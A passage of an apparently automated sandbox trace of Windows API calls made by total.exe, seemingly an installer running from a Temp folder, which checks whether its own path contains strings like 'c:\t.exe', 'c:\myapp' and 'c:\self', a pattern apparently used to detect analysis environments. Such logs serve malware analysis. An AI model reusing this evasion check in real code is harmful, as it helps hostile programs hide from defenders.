returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.889] lstrcpyA (in: lpString1=0x432c00, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.889] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.889] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="46") returned 2 [0157.889] lstrcpyA (in: lpString1=0x432800, lpString2="46" | out: lpString1="46") returned="46" [0157.890] lstrcpynA (in: lpString1=0x42e3a0, lpString2="46", iMaxLength=1024 | out: lpString1="46") returned="46" [0157.890] 
lstrlenA (lpString="46") returned 2 [0157.890] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.890] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.890] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.890] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.890] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.890] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.890] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.890] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.890] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.890] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" 
(normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.890] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.891] lstrcpynA (in: lpString1=0x31441c, lpString2="User32::CharLower(t R1 R1)i", iMaxLength=1024 | out: lpString1="User32::CharLower(t R1 R1)i") returned="User32::CharLower(t R1 R1)i" [0157.891] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.891] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.891] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.891] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.891] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.891] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.891] lstrcpyA (in: lpString1=0x321398, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.891] lstrcpyA (in: lpString1=0x3217a8, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.891] lstrcpyA (in: lpString1=0x321ba8, lpString2="CharLower" | out: lpString1="CharLower") returned="CharLower" 
[0157.891] GetModuleHandleA (lpModuleName="User32") returned 0x76780000 [0157.891] GetProcAddress (hModule=0x76780000, lpProcName="CharLower") returned 0x0 [0157.891] lstrlenA (lpString="CharLower") returned 9 [0157.891] GetProcAddress (hModule=0x76780000, lpProcName="CharLowerA") returned 0x767a3e75 [0157.891] lstrcpynA (in: lpString1=0x321398, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.892] lstrcpynA (in: lpString1=0x314418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.892] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.892] lstrcpynA (in: lpString1=0x321398, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.892] lstrcpyA (in: lpString1=0x432c00, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.892] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="3228696") returned 7 [0157.892] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.892] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.892] lstrcpynA (in: lpString1=0x40ac18, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.892] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.892] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.892] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.892] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.892] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.892] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.892] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.892] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff 
[0157.892] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\t.exe')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\t.exe')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\t.exe')i.R0 ?c" [0157.893] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.893] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.893] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.893] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.893] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.893] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.893] lstrcpyA (in: lpString1=0x321398, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.893] lstrcpyA (in: lpString1=0x3217a8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.893] lstrcpyA (in: lpString1=0x321ba8, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.893] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\t.exe", iMaxLength=1024 | out: lpString1="c:\\t.exe") returned="c:\\t.exe" [0157.893] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.893] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.893] lstrlenA (lpString="strstr") returned 6 [0157.893] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 
[0157.893] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.893] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.894] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\t.exe", iMaxLength=1024 | out: lpString1="c:\\t.exe") returned="c:\\t.exe" [0157.894] lstrcpynA (in: lpString1=0x322c50, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.894] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\t.exe") returned 0x0 [0157.894] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\t.exe", iMaxLength=1024 | out: lpString1="c:\\t.exe") returned="c:\\t.exe" [0157.894] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.894] wsprintfA (in: param_1=0x322c50, param_2="%d" | out: param_1="0") returned 1 [0157.894] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.894] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.894] lstrlenA (lpString="0") returned 1 [0157.894] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.894] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 
48 [0157.894] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.894] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.894] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.894] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.894] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.894] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.894] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.894] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.895] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.895] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\myapp')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\myapp')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\myapp')i.R0 ?c" [0157.895] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.895] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.895] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.895] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.895] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.895] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.895] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.895] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.895] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.895] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\myapp", iMaxLength=1024 | out: lpString1="c:\\myapp") returned="c:\\myapp" [0157.895] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.895] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.895] lstrlenA (lpString="strstr") returned 6 [0157.896] 
GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.896] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.896] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.896] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\myapp", iMaxLength=1024 | out: lpString1="c:\\myapp") returned="c:\\myapp" [0157.896] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.896] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\myapp") returned 0x0 [0157.896] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\myapp", iMaxLength=1024 | out: lpString1="c:\\myapp") returned="c:\\myapp" [0157.896] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.896] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.896] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.896] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.896] lstrlenA (lpString="0") returned 1 [0157.896] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.896] lstrlenA 
(lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.896] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.896] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.896] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.896] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.896] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.896] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.896] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.896] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.897] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.897] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\self')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\self')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\self')i.R0 ?c" [0157.897] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.897] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.897] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.897] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.897] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.897] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.897] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.897] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.897] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.897] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\self", iMaxLength=1024 | out: lpString1="c:\\self") returned="c:\\self" [0157.897] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.898] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 
[0157.898] lstrlenA (lpString="strstr") returned 6 [0157.898] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.898] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.898] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.898] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\self", iMaxLength=1024 | out: lpString1="c:\\self") returned="c:\\self" [0157.898] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.898] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\self") returned 0x0 [0157.898] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\self", iMaxLength=1024 | out: lpString1="c:\\self") returned="c:\\self" [0157.898] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.898] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.898] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.898] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.898] lstrlenA (lpString="0") returned 1 [0157.898] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
